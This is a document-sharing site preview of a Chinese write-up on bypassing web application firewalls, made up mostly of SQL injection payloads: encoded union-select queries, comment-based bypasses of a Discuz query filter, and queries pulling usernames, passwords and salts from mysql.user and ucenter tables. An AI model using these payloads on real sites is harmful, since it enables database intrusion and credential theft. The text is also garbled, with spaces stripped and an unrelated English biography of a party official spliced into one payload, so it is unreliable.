返回
那些年我们绕过的waf

那些年我们绕过的waf

ID:16970860

大小:18.33 KB

页数:8页

时间:2018-08-26

那些年我们绕过的waf_第1页
那些年我们绕过的waf_第2页
那些年我们绕过的waf_第3页
那些年我们绕过的waf_第4页
那些年我们绕过的waf_第5页
资源描述:

《那些年我们绕过的waf》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、本文主要是总结了WAF绕过的各种方法,大家在测试中可以使用以下的方法进行WAF的绕过,希望对大家有帮助。一、各种编码绕过1、URL编码?id=1unionselectpassfromadminlimit1?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%312、Unicode编码'e'=>'%u0065',//这是他的Unicode编码?i

2、d=1unionselectpassfromadminlimit1?id=1un%u0069onsel%u0065ctpassf%u0072omadminli%u006dit13、针对disuczx内置_do_query_safe()的绕过gid=1and1=2unionselect1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13frommysql.user拦截gid=1and1=2union/*!50000select*/1,2,3,4,5,6,conc

3、at(user,0x23,password),8,9,10,11,12,13frommysql.user绕过disuczx2.0gid=@`'`unionselect@`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14frommysql.user绕过disuczx2.5gid=`'`or@`''`unionselect1from(selectcount(*),concat((selectdatabase()),floor(rand(0)*2))af

4、rominformation_schema.tablesgroupbya)bwhere@`'`绕过disuczx2.5二次修补这里我引入了`'`用来隐藏第一个@字符,并将第一个@`'`替换为@`''`,这样便可以替换掉第二个@4、绕过某waf–byhavij/*!30000unionallselect(selectdistinctconcat(0x7e,0x27,unhex(Hex(cast(schema_nameaschar))),0x27,0x7e)from`information_schema`.schema

5、talimit10,1),null,null,null,null*/--otherstaffoftheCentre.Duringthewar,ZhuwastransferredbacktoJiangxi,andDirectorofthenewOfficeinJingdezhen,JiangxiCommitteeSecretary.Startingin1939servedasrecorderoftheWestNorthOrganization,SecretaryoftheSpecialCommitteeAfterth

6、evictoryofthelongMarch,hehasbeentheNorthwestOfficeoftheFederationofStateenterprisesMinister,ShenmufuguSARmissions,DirectorofNingxiaCountypartyCommitteeSecretaryandrecorderoftheCountypartyCommitteeSecretary,Ministersandlist.php?yw=bj&id=3&id=1/*!30000unionallse

7、lect(selectconcat(0x27,uid,0x5e,username,0x5e,password,0x5e,email,0x5e,salt,0x27)from`gs_ucenter`.uc_memberslimit0,1),null,null,null,null*/--5、某次笔记newsid=60+a%nd%201=(se%lect%20@@VERSION)--newsid=60+a%nd%201=(se%lect%20@@servername)--newsid=60+a%nd1=(se%lectna

8、mef%rommas%ter.dbo.sysd%atabaseswh%eredbid=1)--newsid=60+a%nd(se%lectt%o%p1namef%rompedaohang.d%b%o.s%ys%obje%ctswherextype='U'a%ndnamenotin(se%lecttop1namefr%omgpbctv.dbo.sysobjec

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。